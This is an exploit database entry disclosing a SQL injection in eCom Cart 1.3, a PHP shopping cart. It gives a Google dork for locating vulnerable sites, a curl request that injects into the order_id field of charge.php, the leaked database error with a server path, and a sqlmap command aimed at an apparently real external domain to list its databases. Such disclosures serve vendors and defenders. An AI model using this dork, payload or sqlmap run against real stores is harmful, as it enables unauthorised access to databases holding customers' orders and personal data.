eCom Cart 1.3 SQL Injection

2017-06-12T00:00:00
ID PACKETSTORM:142900
Type packetstorm
Reporter Alperen Eymen Ozcan
Modified 2017-06-12T00:00:00

Description

                                        
                                            `# Exploit Title: eCom Cart 1.3 Exploit  
# Google Dork: inurl:"/pdetails/11" ([11] is variable)  
# Date: 10.06.2017  
# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci  
# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007  
# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007  
# Version: 1.3  
# Tested on: Linux  
  
  
  
$ curl http://localhost/ecom-cart/charge.php -d order_id=%271  
  
Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access  
violation: 1064 You have an error in your SQL syntax; check the manual  
that corresponds to your MariaDB server version for the right syntax  
to use near '1'' at line 1 in  
/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16  
Stack trace:  
#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):  
PDO->query('SELECT * FROM 3...')  
#1 {main}  
thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php  
on line 16  
  
$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs  
  
  
`